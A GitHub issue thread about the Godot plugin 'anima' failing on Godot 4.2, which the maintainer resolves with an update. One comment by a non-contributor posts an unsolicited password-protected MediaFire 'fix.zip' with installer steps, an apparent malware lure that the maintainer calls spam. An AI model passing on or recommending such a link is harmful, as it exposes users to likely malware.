### ISSUE TITLE
Plugin does not work with demo project

### ISSUE THREAD

**Issue by smedelyan** [ceceppa/anima#42]
Hi. I cloned the repo as-is in Godot `4.2.2.stable` to take a look at what this plugin can do. However, there are tons of source code errors, and during project import godot also says that it's been last edited in version `4.1`.

Is this plugin still maintained at all?.. It seems to have lots of stars and commits, so it's weird it's that hard to spin up and run.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by smedelyan** [comment]
@llowvxe sorry, I don't really trust such downloads. I also don't see you in the list of contributors, so this looks suspicious to me. Can you please share a link to the source code on github (or any other place where I can see the code without downloading it from a 3rd-party with lots of ads)?

**Comment by ceceppa** [comment]
@smedelyan, the other comment was spam.

However, the last version I tested the plugin for was Godot 4.1. The plugin is still maintained, although I don't have tons of time to dedicate to it.
However, because I'm now working on a personal project, I'm upgrading the support to Godot 4.3.

**Comment by ceceppa** [comment]
I just pushed a fix that works for both Godot 4.2 and Godot 4.3.
Demos are also available here: https://ceceppa.me/anima-demo/

**Comment by smedelyan** [comment]
I confirm it works now. Thank you very much!
